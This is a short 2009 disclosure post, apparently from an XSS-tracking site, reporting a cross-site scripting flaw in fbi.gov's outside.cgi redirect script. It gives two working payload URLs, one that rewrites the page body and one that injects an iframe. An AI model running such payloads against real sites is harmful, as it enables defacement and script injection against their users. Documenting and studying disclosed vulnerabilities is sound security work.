Home
|
News
|
Articles
|
Adv.
|
Submit
|
Alerts
|
Links
|
XSS info
|
About
|
Contact
XSS Archive
|
XSS Archive
|
TOP Submitters
|
TOP Submitters
|
TOP Pagerank
|
Advertisements
FBI.gov xssed!
Written by KF
Friday, 9 January 2009
Ok it is not the first time, but they had fixed them all. It will probably be the third or fourth time they try to address this damn cgi! Here is the XSS that Babaconda submitted to us (works only in Internet Explorer):
http://www.fbi.gov/cgi-bin/outside.cgi?http://www.google.com/</script><script/defer>document.body.innerHTML='xssed'+unescape('%20')+'by'+unescape('%20')+'babaconda'</script>
For the iframe fans, here's one:
http://www.fbi.gov/cgi-bin/outside.cgi?http://www.fbi.gov/</script><script/defer>document.body.innerHTML='<iframe/src=http://xssed.com>'</script>
Here is the mirror:
http://www.xssed.com/mirror/46852/
Have a look at the previous XSS affecting *.fbi.gov:
http://www.xssed.com/archive/domain=fbi.gov
Advertisements
Home
|
News
|
Articles
|
Advisories
|
Submit
|
Alerts
|
Links
|
What is XSS
|
About
|
Contact
|
Some Rights Reserved.
Ok it is not the first time, but they had fixed them all. It will probably be the third or fourth time they try to address this damn cgi! Here is the XSS that Babaconda submitted to us (works only in Internet Explorer):
